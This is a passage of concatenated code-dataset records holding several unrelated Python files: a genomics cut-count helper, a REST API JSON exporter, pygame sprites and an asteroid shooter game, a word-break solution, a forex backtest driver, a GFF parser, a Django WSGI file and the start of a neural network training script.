GenotypeError as e:\n continue\n except IndexError as e:\n pass\n\n ref_fw_cutarray = np.array([ tmp_ref_fw.get(i, 0.0) for i in range(start, end) ])\n ref_rev_cutarray = np.array([ tmp_ref_rev.get(i, 0.0) for i in range(start, end) ])\n alt_fw_cutarray = np.array([ tmp_alt_fw.get(i, 0.0) for i in range(start, end) ])\n alt_rev_cutarray = np.array([ tmp_alt_rev.get(i, 0.0) for i in range(start, end) ])\n return {ref: {'+': ref_rev_cutarray[::-1] if flip else ref_fw_cutarray, \n '-': ref_fw_cutarray[::-1] if flip else ref_rev_cutarray}, \n alt: {'+': alt_rev_cutarray[::-1] if flip else alt_fw_cutarray, \n '-': alt_fw_cutarray[::-1] if flip else alt_rev_cutarray}}\n\n def get_allelic_reads(self, interval, pos, ref, alt, flip=False):\n chrom = interval.chrom\n start = interval.start\n end = interval.end\n flip = True if interval.strand == '-' else False\n ret = self.__lookup_allelic(chrom, start, end, pos, ref, alt, flip)\n return ret","sub_path":"pycfiles/footprint_tools-1.0-py2.7-linux-x86_64/cutcounts.py","file_name":"cutcounts.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"494051388","text":"#!/usr/bin/python3\n\"\"\"\nUsing a rest api to grab employee tasks\n\"\"\"\n\nimport json\nimport requests\nfrom sys import argv\n\n\ndef get_user_info(id):\n \"\"\"\n grabs info from singular user based on input id\n \"\"\"\n r = requests.get(\n \"https://jsonplaceholder.typicode.com/users/{}\".format(id)).json()\n name = r[\"username\"]\n with open(\"{}.json\".format(id), \"w\") as output:\n data = {}\n data[str(id)] = []\n r = requests.get(\"https://jsonplaceholder.typicode.com/todos\").json()\n for indiv in r:\n if indiv[\"userId\"] == id:\n info = {}\n info[\"task\"] = indiv[\"title\"]\n info[\"completed\"] = indiv[\"completed\"]\n info[\"username\"] = name\n data[str(id)].append(info)\n json.dump(data, output)\n\n\nif __name__ == \"__main__\":\n get_user_info(int(argv[1]))\n","sub_path":"0x15-api/2-export_to_JSON.py","file_name":"2-export_to_JSON.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"252861465","text":"from pygame.sprite import Sprite\n\n\nclass PointsSprite(Sprite):\n def __init__(self, settings, screen, font, x, y, points_value):\n super(PointsSprite, self).__init__()\n self.settings = settings\n self.screen = screen\n self.font = font\n\n if points_value != 0:\n self.rect = self.font[\"0\"].get_rect()\n else:\n self.rect = self.font[\"1UP\"].get_rect()\n self.rect.x = x\n self.rect.y = y\n\n self.points_value = points_value\n self.expiration = 60\n\n def draw(self, x_offset):\n if self.points_value != 0:\n for x in range(0, len(str(self.points_value))):\n self.screen.blit(self.font[str(self.points_value)[x]],\n self.rect.move(x_offset + x * self.settings.scale[\"pixel_width\"] * 4, 0))\n else:\n self.screen.blit(self.font[\"1UP\"], self.rect.move(x_offset, 0))\n self.rect.y -= self.settings.scale[\"pixel_height\"]\n self.expiration -= 1\n if self.expiration <= 0:\n self.kill()\n","sub_path":"points_sprite.py","file_name":"points_sprite.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647052353","text":"class Solution:\n\n def wordBreak3(self,s,dict):\n if not s:\n return 1\n if not dict:\n return 0\n\n n = len(s)\n wordLower = set([word.lower() for word in dict])\n dp = [0]*(n+1)\n dp[0]=1\n\n for i in range(1,n+1):\n for j in range(i):\n if s[j:i].lower() in wordLower:\n dp[i] += dp[j]\n\n return dp[n]\n\na = Solution()\ns = \"CatMat\"\ndict1 = [\"Cat\", \"Mat\", \"Ca\", \"tM\", \"at\", \"C\", \"Dog\", \"og\", \"Do\"]\n\nb = a.wordBreak3(s,dict1)\nprint(b)","sub_path":"lintcode/第九层/683_单词拆分3---.py","file_name":"683_单词拆分3---.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57083733","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 26 15:03:02 2020\r\n\r\n@author: Rafael Valle\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport openDataBase\r\nimport addDate\r\nimport dropColumns\r\nimport formatDataBase\r\nimport numberContracts\r\nimport renameColumns\r\nimport tableResult\r\nimport savingResult\r\nimport showResult\r\nimport strategyBreakout\r\nimport perfomanceResults\r\n\r\n\r\n#List of all currencies that we want to backtest the breakout strategy\r\nassets = {'Currencies':[\"CADCHF\", \"CADJPY\", \"CHFJPY\", \"EURCAD\", \"EURCHF\", \"EURGBP\", \"EURJPY\", \"EURUSD\", \"GBPCAD\", \"GBPCHF\", \"GBPJPY\", \"GBPUSD\", \"USDBRL\", \"USDCAD\", \"USDCHF\", \"USDJPY\"],\r\n 'Value PIP in USD':[10.15, 8.99, 8.99, 6.90, 10.15, 11.55, 8.99, 10.00, 6.90, 10.15, 8.99, 10.00, 1.94, 6.90, 10.15, 8.99],\r\n 'Multiplier':[100000, 1000, 1000, 100000, 100000, 100000, 1000, 100000, 100000, 100000, 1000, 100000, 100000, 100000, 100000, 1000]}\r\n\r\nasset = pd.DataFrame.from_dict(assets)\r\n\r\ndirectory = \"C:\\\\Users\\\\rafae\\\\Desktop\\\\Dados de Mercado\\\\5M\\\\Currencies\\\\\"\r\n\r\nsave = \"C:\\\\Users\\\\rafae\\\\Desktop\\\\Dados de Mercado\\\\Scripts\\\\Strategies\\\\Momentum\\\\\"\r\n\r\nperformance = pd.DataFrame(columns = ['Market',\r\n 'Net Profit',\r\n 'Sharpe Ratio',\r\n 'Max DD',\r\n '# of Trades',\r\n '% Win',\r\n 'Avg. Win',\r\n 'Avg. Loss'])\r\n\r\nfor b in range(len(asset)):\r\n \r\n data = openDataBase.openDataBase(directory, asset[\"Currencies\"][b])\r\n \r\n start_date = \"2019-02-01 00:00:00\"\r\n end_date = \"2019-12-30 00:00:00\"\r\n \r\n data_format = formatDataBase.formatDataBase(data, start_date, end_date, asset[\"Multiplier\"][b])\r\n \r\n add_contract = numberContracts.numberContracts(data_format, asset[\"Value PIP in USD\"][b], 10000, 100)\r\n \r\n strategy = strategyBreakout.strategyBreakout(add_contract, asset[\"Currencies\"][b], 200, 2.5)\r\n \r\n results = showResult.showResult(strategy, asset[\"Value PIP in USD\"][b])\r\n \r\n savingResult.savingResult(results, asset[\"Currencies\"][b], save)\r\n \r\n performance.loc[b, \"Market\"] = asset[\"Currencies\"][b]\r\n performance[\"Net Profit\"][b] = perfomanceResults.netProfit(strategy)\r\n performance[\"Sharpe Ratio\"][b] = perfomanceResults.sharpeRatio(strategy)\r\n performance[\"Max DD\"][b] = perfomanceResults.maxDD(strategy)\r\n performance[\"# of Trades\"][b] = perfomanceResults.numberTrades(strategy)\r\n performance[\"% Win\"][b] = perfomanceResults.winningTrades(strategy)\r\n performance[\"Avg. Win\"][b] = perfomanceResults.avgWinning(strategy)\r\n performance[\"Avg. Loss\"][b] = perfomanceResults.avgLosing(strategy)\r\n\r\nadress_performance = save + \"Resume_Result_All.txt\"\r\nperformance.to_csv(adress_performance , index=False, sep = ';')","sub_path":"Breakout.py","file_name":"Breakout.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60803687","text":"#!/usr/bin/env python3\n\nimport sys\n\n\ndef help():\n\tprint('''\n\t\tUsage:\n\t\t------------\n\t\tmaker_gff_QI_parse.py -gff \n\n\t\tDescription:\n\t\t------------\n\t\tPrints the QI information from the attribute column of mRNA features in a\n\t\tMAKER-generated GFF3 as tab-delimited text with the following fields in the\n\t\tfollowing order:\n\n\t\tID\n\t\tAED (nucleotide AED)\n\t\teAED (exon AED)\n\t\tLength of the 5' UTR\n\t\tFraction of splice sites confirmed by an EST alignment\n\t\tFraction of exons that overlap an EST alignment\n\t\tFraction of exons that overlap EST or Protein alignments\n\t\tFraction of splice sites confirmed by a SNAP prediction\n\t\tFraction of exons that overlap a SNAP prediction\n\t\tNumber of exons in the mRNA\n\t\tLength of the 3' UTR\n\t\tLength of the protein sequence produced by the mRNA\n\n\t\tOptions:\n\t\t------------\n\t\t-gff\tPath to the gff file to parse\n\n\t\t''')\n\tsys.exit(0)\n\nargs = sys.argv\n\nif not '-gff' in args or len(args) != 3:\n\thelp()\n\nin_fl_pth = args[args.index('-gff') + 1]\n\nprint('ID\\tAED\\teAED\\t5\\'_UTR_len\\tfrac_ss_with_transcript_support\\tfrac_exons_with_transcript_support\\tfrac_exons_with_transc_or_prot_support\\tfrac_ss_with_SNAP_support\\tfrac_exons_with_SNAP_support\\tnum_exons\\t3\\'_UTR_len\\tprot_len')\n\nwith open(in_fl_pth) as in_fl:\n\tfor line in in_fl:\n\t\tif '\\tmRNA\\t' in line:\n\t\t\tfields = line.strip().split('\\t')\n\t\t\tattributes = fields[8].split(';')\n\t\t\tID = attributes[0].split('=')[1]\n\t\t\tAED = attributes[3].split('=')[1]\n\t\t\teAED = attributes[4].split('=')[1]\n\t\t\tQI = attributes[5].split('|')\n\t\t\tQI[0] = QI[0].split('=')[1]\n\t\t\tprint('{0}\\t{1}\\t{2}\\t{3}'.format(ID, AED, eAED, '\\t'.join(QI)))\n","sub_path":"various/maker_gff_QI_parse.py","file_name":"maker_gff_QI_parse.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327099588","text":"__author__ = \"Vanessa Sochat\"\n__copyright__ = \"Copyright 2021, Vanessa Sochat\"\n__license__ = \"Apache-2.0 OR MIT\"\n\nimport os\n\nfrom django.core.wsgi import get_wsgi_application\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"searchapp.settings\")\n\napplication = get_wsgi_application()\n","sub_path":"app/searchapp/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624471411","text":"import pygame\nimport sys\nimport random\nimport os\nimport pygame.transform\nfrom random import randrange, randint\nfrom engine import Game, GameState\nfrom pygame import draw, Color\nfrom pygame.sprite import Sprite, Group, spritecollide, spritecollideany\nfrom ui import Text, Button, Menu\nfrom util import SpriteSheet\nfrom pygame.mixer import Sound\n\n### Game Constants ###\nSCREEN_SIZE = [800, 650]\nINITIAL_POSITION = [(SCREEN_SIZE[0] / 2) - 100, SCREEN_SIZE[1] - 100]\nDEFAULT_TEXT_FONT = (None, 26)\nSUB_TITLE_FONT = (\"assets/Fonts/Coda-Regular.ttf\", 40)\nMAIN_TITLE_FONT = (\"assets/Fonts/BowlbyOne-Regular.ttf\", 64)\nGAME_TITLE = \"Unreal Space\"\n\n### Game Objects ###\nclass Player(Sprite):\n def __init__(self, position = [0,0], score = 0, lifes = 100):\n Sprite.__init__(self)\n self.position = position\n self.image = pygame.image.load(\"assets/images/player.png\").convert()\n self.image.set_colorkey((0, 0, 0))\n self.rect = self.image.get_rect(topleft = self.position)\n self.score = score\n self.lifes = lifes\n self.missile = None\n self.hit_sound = Sound(\"assets/sound/187535-crash.ogg\")\n\n def update(self):\n self.rect.x, self.rect.y = self.position\n\n if self.missile != None:\n self.missile.update()\n\n def shot(self, screen):\n self.missile = Missile(self.position)\n self.missile.emit_shot_sound()\n return self.missile\n\n def hit(self):\n self.hit_sound.play()\n return PlayerHitAnimation(self)\n\nclass Missile(Sprite):\n def __init__(self, ship_pos):\n super(Missile, self).__init__()\n self.image = pygame.Surface([2, 10])\n self.image.fill([255, 255, 255])\n self.image.set_colorkey((0, 0, 0))\n self.rect = self.image.get_rect()\n self.rect.x = ship_pos[0] + 45\n self.rect.y = ship_pos[1] - 10\n self.sonido = pygame.mixer.Sound(\"assets/sound/laser4.wav\")\n\n def update(self):\n self.rect.y -= 10\n\n def emit_shot_sound(self):\n self.sonido.play()\n\nclass Asteroid(Sprite):\n def __init__(self, image_url, image_width, image_height, inset = None):\n super(Asteroid, self).__init__()\n self.sheet = SpriteSheet(image_url)\n self.images = self.sheet.images_by(image_width, image_height, Color(\"black\"), inset)\n self.current_frame = 0\n self.image = self.images[self.current_frame]\n self.rect = self.image.get_rect(\n top = randint(-100, 0),\n left = randint(0, SCREEN_SIZE[0]),\n width = image_width,\n height = image_height\n )\n self.frame_speed = 1.5\n self.animation_counter = 0\n\n def update(self):\n if self.animation_counter == (self.frame_speed - 1):\n self.current_frame = (\n (self.current_frame + 1) if self.current_frame < len(self.images) else 0\n )\n self.animation_counter = (self.animation_counter + 1) % self.frame_speed\n self.image = self.images[self.current_frame - 1]\n\n if self.rect.y > SCREEN_SIZE[1]:\n self.rect.y = 0\n self.rect.x = random.randint(0, SCREEN_SIZE[0])\n else:\n self.rect.y += self.speed\n\nclass Asteroid100Points(Asteroid):\n def __init__(self):\n super(Asteroid100Points, self).__init__(\n \"assets/images/100asteroid.png\", 64, 64, (15, 15, 30, 30)\n )\n self.points = 100\n self.speed = 1\n\n def update(self):\n self.speed = randint(1, 5)\n super(Asteroid100Points, self).update()\n\nclass Asteroid500Points(Asteroid):\n def __init__(self):\n super(Asteroid500Points, self).__init__(\n \"assets/images/200asteroid.png\", 240, 320, (40, 84, 80, 150)\n )\n self.speed = 3\n self.points = 600\n\n def update(self):\n self.speed = randint(3, 5)\n super(Asteroid500Points, self).update()\n\nclass PlayerHitAnimation(Sprite):\n def __init__(self, player):\n super(PlayerHitAnimation, self).__init__()\n self.player = player\n self.sheet = SpriteSheet(\"assets/images/Sprite_FX_Explosion_0042.png\")\n self.images = self.sheet.images_by(148, 148, (0, 0, 0))\n self.current_frame = 0\n self.frame_speed = 2\n self.animation_counter = 0\n self.image = self.images[self.current_frame]\n self.rect = self.image.get_rect(\n left = self.player.rect.x, top = self.player.rect.y\n )\n\n def update(self):\n if self.animation_counter == (self.frame_speed - 1):\n self.current_frame = (self.current_frame + 1) % len(self.images)\n self.animation_counter = (self.animation_counter + 1) % self.frame_speed\n\n self.image = self.images[self.current_frame - 1]\n self.rect = self.image.get_rect(\n left = self.player.rect.x, top = self.player.rect.y\n )\n\n if self.current_frame == len(self.images) - 1:\n self.kill()\n\nclass AsteroidExplosion(Sprite):\n def __init__(self, exploded_object):\n super(AsteroidExplosion, self).__init__()\n self.exploded_object = exploded_object\n self.sheet = SpriteSheet(\"assets/images/Sprite_FX_Explosion_0015.png\")\n self.images = self.sheet.images_at(\n [\n (52, 88, 118, 124), (268, 72, 136, 140), (480, 70, 158, 160),\n (699, 62, 172, 168), (914, 82, 186, 186), (1140, 46, 200, 190),\n (1106, 558, 246, 328)\n ],\n (0, 128, 0)\n )\n self.current_frame = 0\n self.image = self.images[self.current_frame]\n self.rect = self.image.get_rect(top = exploded_object.y, left = exploded_object.x)\n self.sound = Sound(\"assets/sound/Explosion-SoundBible.com-2019248186.wav\")\n\n def update(self):\n self.current_frame = (self.current_frame + 1) % len(self.images)\n self.image = self.images[self.current_frame - 1]\n self.rect = self.image.get_rect(\n topleft = (\n (self.exploded_object.x + self.exploded_object.width / 2) - (self.image.get_width() / 2),\n (self.exploded_object.y + self.exploded_object.height / 2) - (self.image.get_height() / 2)\n )\n )\n\n if self.current_frame == 0:\n self.kill()\n\n### Stages ####\nclass SplashScreen(GameState):\n def __init__(self):\n super(SplashScreen, self).__init__()\n self.font = pygame.font.Font(MAIN_TITLE_FONT[0], 54)\n self.title = self.font.render(GAME_TITLE, True, (229, 22, 22))\n self.title_rect = self.title.get_rect(x=(SCREEN_SIZE[0] / 2) - 220, y=80)\n self.persist[\"screen_color\"] = \"black\"\n self.next_state = \"GAMEPLAY\"\n self.menu = Menu([\n Button(\"Start\", ((SCREEN_SIZE[0] / 2) - 125, 300, 250, 40)),\n Button(\"Credits\", ((SCREEN_SIZE[0] / 2) - 125, 350, 250, 40))\n ])\n self.sound = Sound(\"assets/sound/MainTheme.wav\")\n self.sound.play()\n\n def startup(self, persistent):\n self.sound.play()\n self.menu.select_option(0)\n\n def get_event(self, event):\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.menu.select_option(-1)\n elif event.key == pygame.K_DOWN:\n self.menu.select_option(1)\n elif event.key == pygame.K_RETURN:\n self.next_state = \"GAMEPLAY\" if self.menu.selected_option == 0 else \"CREDITS\"\n self.persist[\"selected_option\"] = self.menu.selected_option\n self.done = True\n self.sound.stop()\n\n def draw(self, surface):\n surface.fill(Color(\"black\"))\n background = pygame.image.load(\"assets/images/nave.png\").convert()\n background.set_colorkey((255, 255, 255))\n surface.blit(background, [(SCREEN_SIZE[0] / 2) - 250, (SCREEN_SIZE[1] / 2) - 140])\n surface.blit(self.title, self.title_rect)\n self.menu.draw(surface)\n\n def update(self, surface):\n self.menu.update()\n\nclass Credits(GameState):\n def __init__(self):\n super(Credits, self).__init__()\n self.font = pygame.font.Font(SUB_TITLE_FONT[0], 34)\n self.title = self.font.render(\"CREDITS\", True, (255, 255, 255))\n self.title_rect = self.title.get_rect(x=(SCREEN_SIZE[0] / 2) - 80, y=50)\n self.next_state = \"SPLASH\"\n self.menu = Menu([\n Button(\"Back\", ((SCREEN_SIZE[0] / 2) - 125, 390, 250, 40), active = True)\n ])\n\n def get_event(self, event):\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.KEYDOWN:\n self.done = True\n\n def draw(self, surface):\n surface.fill(Color(\"black\"))\n surface.blit(self.title, self.title_rect)\n self.menu.draw(surface)\n\n center = SCREEN_SIZE[0] / 2\n\n Text((100, 20), (center - 50, 200), \"Author\",\n pygame.font.Font(SUB_TITLE_FONT[0], 18),\n Color(\"white\")\n ).draw(surface)\n\n Text((100, 20), (center - 50, 230), \"Jose Saldana\",\n pygame.font.Font(None, 25),\n Color(\"white\")\n ).draw(surface)\n\n Text((100, 20), (center - 50, 280), \"Group\",\n pygame.font.Font(SUB_TITLE_FONT[0], 18),\n Color(\"white\")\n ).draw(surface)\n\n Text((100, 20), (center - 50, 310), \"1LS-231\",\n pygame.font.Font(None, 25),\n Color(\"white\")\n ).draw(surface)\n\nclass Gameplay(GameState):\n def __init__(self):\n super(Gameplay, self).__init__()\n\n self.game_over = False\n self.game_paused = False\n self.level_completed = False\n\n self.player = Player(INITIAL_POSITION)\n self.missiles = Group()\n\n self._100pts_asteroids = pygame.sprite.Group()\n self._500pts_asteroids = pygame.sprite.Group()\n self.asteroids = pygame.sprite.Group()\n self.asteroids.add(self._100pts_asteroids)\n self.asteroids.add(self._500pts_asteroids)\n\n self.explosions_group = Group()\n self.player_hits_group = Group()\n\n self.sound = Sound(\"assets/sound/FranticLevel.wav\")\n self.level_complete_sound = Sound(\"assets/sound/HappyLevel.wav\")\n self.game_over_sound = Sound(\"assets/sound/oops.wav\")\n\n def startup(self, persistent):\n self.persist = persistent\n color = self.persist[\"screen_color\"]\n self.screen_color = pygame.Color(color)\n\n # 100 Points asteroids\n self._100pts_asteroids.add([Asteroid100Points() for i in range(0, randint(1, 40))])\n self.asteroids.add(self._100pts_asteroids)\n\n # 200 Points asteroids\n self._500pts_asteroids.add([Asteroid500Points() for i in range(0, randint(1, 10))])\n self.asteroids.add(self._500pts_asteroids)\n\n self.sound.play(loops = -1)\n\n def get_event(self, event):\n if event.type == pygame.QUIT:\n self.quit = True\n elif event.type == pygame.MOUSEBUTTONDOWN:\n missile = self.player.shot(screen)\n self.missiles.add(missile)\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n self.game_paused = False if self.game_paused == True else True\n\n def update(self, dt):\n if not self.game_paused:\n # Asteroid hit by missile\n for m in self.missiles.sprites():\n collided_asteroids = spritecollide(m, self.asteroids, True)\n\n for collided_asteroid in collided_asteroids:\n if not self.game_over:\n self.player.score += collided_asteroid.points\n\n # Explosion\n explosion = AsteroidExplosion(collided_asteroid.rect)\n self.explosions_group.add(explosion)\n explosion.sound.play()\n\n # Remove both asteroid and missile\n collided_asteroid.kill()\n m.kill()\n\n if len(self.asteroids.sprites()) == 0:\n self.level_completed = True\n\n # Ship hit by asteroid\n collided_asteroids = spritecollide(self.player, self.asteroids, True)\n\n if len(collided_asteroids) > 0:\n self.player_hits_group.add(self.player.hit())\n\n if not self.game_over:\n collided_points = map((lambda a: a.points / 20), collided_asteroids)\n self.player.lifes -= reduce((lambda x, y: x + y), collided_points, 0)\n\n if self.player.lifes <= 0:\n self.game_over = True\n\n # Sprites and groups update\n self.player.update()\n self.asteroids.update()\n self.missiles.update()\n self.explosions_group.update()\n self.player_hits_group.update()\n\n def draw(self, surface):\n # Set background\n surface.fill(self.screen_color)\n background = pygame.image.load(\"assets/images/saturn.jpg\").convert()\n surface.blit(background, [0, 0])\n\n # Draw player\n self.player.position = pygame.mouse.get_pos()\n surface.blit(self.player.image, self.player.rect)\n\n # Draw asteroids\n self.asteroids.draw(surface)\n self.missiles.draw(surface)\n self.explosions_group.draw(surface)\n self.player_hits_group.draw(surface)\n\n # Draw title bar\n pygame.draw.rect(surface, Color(\"black\"), [0, 0, SCREEN_SIZE[0], 50])\n\n # Blit Title\n title_font = pygame.font.Font(MAIN_TITLE_FONT[0], 28)\n title = title_font.render(GAME_TITLE, True, Color(\"white\"))\n surface.blit(title, [(SCREEN_SIZE[0] / 2) - 100, 10])\n\n # Draw the title bar\n self.draw_title_bar(surface)\n\n # Draw Game Paused\n if self.game_paused and not (self.level_completed or self.game_over):\n self.draw_game_paused(surface)\n\n # Draw Level Completed\n if self.level_completed and not self.game_over:\n self.draw_level_complete(surface)\n self.sound.stop()\n self.level_complete_sound.play()\n\n # Draw Game Over if applicable\n if self.game_over:\n self.draw_game_over(surface)\n self.sound.stop()\n self.game_over_sound.play()\n\n def draw_title_bar(self, surface):\n sub_title_font = pygame.font.Font(SUB_TITLE_FONT[0], 18)\n score = sub_title_font.render(\"Score: \" + str(self.player.score), True, Color(\"white\"))\n lifes = sub_title_font.render(\"Lifes: \", True, Color(\"white\"))\n surface.blit(score, [20, 20])\n surface.blit(lifes, [SCREEN_SIZE[0] - 150, 20])\n life_img = pygame.image.load(\"assets/images/life.png\").convert()\n for life in range(0, self.player.lifes / 25):\n surface.blit(life_img, [(SCREEN_SIZE[0] - 80) + (life * 20), 25])\n\n def draw_game_over(self, surface):\n text_font = pygame.font.Font(SUB_TITLE_FONT[0], 70)\n game_over_text = text_font.render(\"GAME OVER\", True, Color(\"red\"))\n surface.blit(game_over_text, [(SCREEN_SIZE[0] / 2) - 160, (SCREEN_SIZE[1] / 2) - 30])\n\n def draw_level_complete(self, surface):\n text_font = pygame.font.Font(SUB_TITLE_FONT[0], 40)\n game_over_text = text_font.render(\"Level Completed\", True, Color(\"white\"))\n surface.blit(game_over_text, [(SCREEN_SIZE[0] / 2) - 150, (SCREEN_SIZE[1] / 2) - 20])\n\n def draw_game_paused(self, surface):\n text_font = pygame.font.Font(SUB_TITLE_FONT[0], 40)\n game_over_text = text_font.render(\"Paused\", True, Color(\"white\"))\n surface.blit(game_over_text, [(SCREEN_SIZE[0] / 2) - 100, (SCREEN_SIZE[1] / 2) - 20])\n\n### Main Entry Point ###\nif __name__ == \"__main__\":\n pygame.init()\n pygame.font.init()\n pygame.mixer.init()\n\n screen = pygame.display.set_mode(SCREEN_SIZE)\n\n pygame.mouse.set_visible(False)\n pygame.mouse.set_pos(INITIAL_POSITION)\n\n states = {\n \"SPLASH\": SplashScreen(),\n \"GAMEPLAY\": Gameplay(),\n \"CREDITS\": Credits()\n }\n\n game = Game(screen, states, \"SPLASH\")\n game.run()\n\n pygame.quit()\n sys.exit()\n","sub_path":"unreal_space.py","file_name":"unreal_space.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313580420","text":"import pygame\nfrom pygame.sprite import Sprite\nfrom random import randint\n\n\nclass Ball(Sprite):\n \"\"\"class to represent the ball on the surface\"\"\"\n def __init__(self, settings, screen):\n super(Ball, self).__init__()\n self.screen = screen\n self.settings = settings\n\n self.image = pygame.image.load(r'D:\\Code\\images\\ball.bmp')\n self.rect = self.image.get_rect()\n self.rect.x = randint(100, 1100 )\n self.rect.y = self.rect.height\n\n self.x = float(self.rect.x)\n self.y = float(self.rect.y)\n\n # Ball speed settings\n\n\n\n def update(self):\n self.y += self.settings.ball_speed_factor\n\n if self.y >= self.settings.screen_height:\n self.y = -self.rect.height\n self.rect.x = randint(10, 1150)\n self.rect.y = self.y\n\n\n\n\n\n def blitme(self):\n self.screen.blit(self.image, self.rect)\n","sub_path":"Chapter 13 - Aliens/13-5 Catch/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491930643","text":"import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef plotPoints( ):\n\n list_of_lists = [[1, 2], [3, 3], [4, 4], [5, 2]]\n x_list = [x for [x, y] in list_of_lists]\n y_list = [y for [x, y] in list_of_lists]\n # plt.plot([1,2], [2,3], 'or')\n # plt.plot([1,2], [3,4], 'ob')\n plt.scatter(1,2, color='r')\n plt.scatter(2,3, color='b')\n plt.axis([0, 5, 0, 5])\n #plt.plot([2,3], 'b')\n plt.show(block=True)\n\n\ndef printme( str ):\n #\"This prints a passed string into this function\"\n print (str)\n return\n\nprintme(\"hello\")\nplotPoints()","sub_path":"NeuralNetworks/hw1/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557804789","text":"\nA = [[0.7, 0.3],\n [0.4, 0.6]]\nB = [[0.1, 0.4, 0.5],\n [0.7, 0.2, 0.1]]\npi = [0.6, 0.4]\n\nS = 0;\nM = 1;\nL = 2\nSet1 = [0, 1, 2]\n\nO = []\ntotalsum = 0\n\nfor a in range(3):\n for b in range(3):\n for c in range(3):\n for d in range(3):\n O.append([a, b, c, d])\n\nN = len(pi) # total states\nM = len(O[0]) # total observations\n#print(N, M)\n#print(O)\nprint(\"M = \",M)\n# compute alpha zero\nfor step in range(81):\n alpha = [[0.0 for i in range(N)] for _ in range(M)]\n sum = 0.0\n # print(alpha)\n for i in range(N):\n alpha[0][i] = (pi[i] * B[i][O[step][0]])\n # compute alpha (i)\n for t in range(1, M):\n for i in range(N):\n alpha[t][i] = 0\n for j in range(0, N):\n alpha[t][i] = alpha[t][i] + alpha[t - 1][j] * A[j][i]\n alpha[t][i] = alpha[t][i] * B[i][O[step][t]]\n sum += alpha[M-1][i]\n totalsum += sum\n print(\"Observation : \", O[step])\n print(\"Alpha = \",alpha)\n print(\"Sum = \", sum)\n\n\nprint(\"Total Sum = \",totalsum)\n","sub_path":"CS271HMK_Assignment1_Duong_3857/HW3-b.py","file_name":"HW3-b.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43122838","text":"import argparse\nimport os\nimport time\nfrom typing import *\n\nimport torch\nimport torch.nn\nimport torch.utils.data\nimport torch.optim.optimizer\nimport yaml\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom data import create_datasets_and_loaders_from_args\nfrom data.hydranet_dataset import HydranetDataset\nfrom hydranet import HydraNet\nfrom sr import StyleRandomizer\n\ntry:\n import apex\n from utils.fp16_conversion import convert_network_and_get_optimizer_as_fp16\n\n APEX_AVAILABLE = True\nexcept ModuleNotFoundError as err:\n APEX_AVAILABLE = False\n\n\ndef iters_from_name(checkpoint_name: str) -> int:\n return int(''.join(char for char in checkpoint_name if char.isdigit()))\n\n\ndef save_model(model: torch.nn.Module, checkpoint_dir: str, iters, name: str = \"model\", iters_to_keep=()) -> int:\n checkpoints_to_delete = [path for path in os.listdir(checkpoint_dir) if\n path.endswith('.pth') and iters_from_name(path) not in iters_to_keep]\n path = os.path.join(checkpoint_dir, f'{name}.ckpt-{iters}.pth')\n state_dict = {k.replace('module.', ''): v for k, v in model.state_dict().items()} # Remove DataParallel artifacts\n torch.save(state_dict, path)\n print('Saved model to', path)\n for cp in checkpoints_to_delete:\n path = os.path.join(checkpoint_dir, cp)\n print('Deleting checkpoint', path)\n os.remove(path)\n\n\ndef save_definition(definition_path: str, backbone_name: str, hydranet: HydraNet):\n print(f'Saving hydranet config to {definition_path}')\n hydranet_definition = {'backbone': backbone_name}\n for name, head in hydranet.heads.items():\n hydranet_definition[name] = {'key': head.key, 'params': head.params}\n with open(definition_path, 'w') as f:\n yaml.dump(hydranet_definition, f)\n\n\ndef move_to_devices(hydranet: HydraNet, gpu_ids: List[int], device: str) -> None:\n print('Using devices:', [f'cuda:{i}' for i in gpu_ids])\n if len(gpu_ids) > 1:\n hydranet.backbone = torch.nn.DataParallel(hydranet.backbone, device_ids=gpu_ids).to(device)\n for head in hydranet.heads:\n hydranet.heads[head] = torch.nn.DataParallel(hydranet.heads[head], device_ids=gpu_ids)\n else:\n hydranet.backbone.to(device)\n\n\ndef load_weights_and_get_iteration_from_checkpoint(hydranet: HydraNet, checkpoint_dir: str, exp_name: str = None, reset_iter=False, sloppy=False, backbone_only=False) -> int:\n if os.path.isfile(checkpoint_dir):\n checkpoint_path = checkpoint_dir\n state_dict = torch.load(checkpoint_path, map_location='cpu')\n else:\n if exp_name is None:\n head_tail = os.path.split(checkpoint_dir)\n exp_name = head_tail[0].split('/')[-1]\n sortkey = lambda x: int(''.join([c for c in x if c.isdigit()]))\n\n 